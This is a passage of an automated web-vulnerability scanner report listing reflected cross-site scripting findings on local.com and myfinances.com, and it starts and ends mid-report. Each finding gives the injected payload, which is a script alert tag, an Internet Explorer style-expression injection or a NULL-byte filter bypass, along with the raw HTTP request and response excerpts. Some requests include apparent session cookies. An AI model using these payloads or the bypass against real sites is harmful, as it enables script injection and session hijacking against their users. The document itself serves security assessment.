This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:03:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:03:03 GMT Content-Length: 17806 Connection: close Set-Cookie: adc=RSP; path=/;
1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1 Host: www.myfinances.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 16:26:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:26:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: adc=RSP; path=/; Content-Length: 17748
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:01:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:01:58 GMT Content-Length: 17623 Connection: close Set-Cookie: adc=RSP; path=/;
1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171093.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:23 GMT Content-Length: 13431 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'"> ...[SNIP]...
1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171103.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:21 GMT Content-Length: 13823 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'"> ...[SNIP]...
1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227953.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:13 GMT Content-Length: 14027 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'"> ...[SNIP]...
1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3227963.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:58 GMT Content-Length: 13645 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'"> ...[SNIP]...
1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3241183.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13681 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'"> ...[SNIP]...
1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3241193.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 14125 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'"> ...[SNIP]...
1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299523.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:39 GMT Content-Length: 13301 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'"> ...[SNIP]...
1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3299533.html
Issue detail
